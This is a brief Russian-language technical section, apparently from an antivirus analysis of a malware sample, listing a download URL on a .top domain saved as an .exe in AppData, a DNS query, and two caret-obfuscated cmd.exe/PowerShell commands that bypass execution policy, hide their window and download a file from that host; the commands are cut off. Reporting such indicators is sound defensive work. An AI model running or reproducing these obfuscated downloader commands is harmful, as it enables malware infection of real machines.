Техническая информация
- http://zussipussicscds.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOWeRS^HeLL^.ExE^ -^ExE^cUt^i^onPo^Li^CY B^Ypas^s^ -n^OproF^IlE ^-Wi^N^DOwSTyL^E Hi^d^d^en^ (^ne^w-^OB^J^E^CT^ SyS^t^E^m.n^E^T^.WEbcli^EN^T)^.D^O^WN^LOA^DfiLe('http://zussipussicscds....
- DNS ASK zu####ussicscds.top
- '<SYSTEM32>\cmd.exe' /C "pOWeRS^HeLL^.ExE^ -^ExE^cUt^i^onPo^Li^CY B^Ypas^s^ -n^OproF^IlE ^-Wi^N^DOwSTyL^E Hi^d^d^en^ (^ne^w-^OB^J^E^CT^ SyS^t^E^m.n^E^T^.WEbcli^EN^T)^.D^O^WN^LOA^DfiLe('http://zussipussicscds....' (со скрытым окном)